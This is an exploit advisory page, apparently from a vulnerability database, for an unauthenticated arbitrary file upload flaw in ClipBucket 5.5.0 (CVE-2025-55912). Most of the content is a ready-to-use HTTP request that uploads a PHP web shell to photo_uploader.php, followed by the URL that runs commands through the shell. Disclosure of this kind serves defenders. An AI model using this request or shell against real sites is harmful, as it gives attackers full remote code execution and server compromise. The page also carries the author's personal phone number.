ClipBucket 5.5.0 Arbitrary File Upload

2026.02.14

Credit: Mukundsinh Solanki (r00td3str0y3r)

Risk: High

Local: No

Remote: Yes

CVE: CVE-2025-55912

CWE: CWE-264

# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload

# Google Dork: N/A

# Date: 2025-09-11

# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)

# Vendor Homepage: https://clipbucket.com

# Software Link: https://github.com/MacWarrior/clipbucket-v5

# Version: <= 5.5.0

# Tested on: Ubuntu 20.04 LTS, PHP 7.4

# CVE: CVE-2025-55912

## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).

## PoC Request:

POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--


The file is uploaded without authentication. The attacker can then access
it:


http://victim.com/files/photos/shell.php?cmd=id


## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server

Regards,
Mukundsinh Solanki
+916355251151

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ClipBucket 5.5.0 Arbitrary File Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.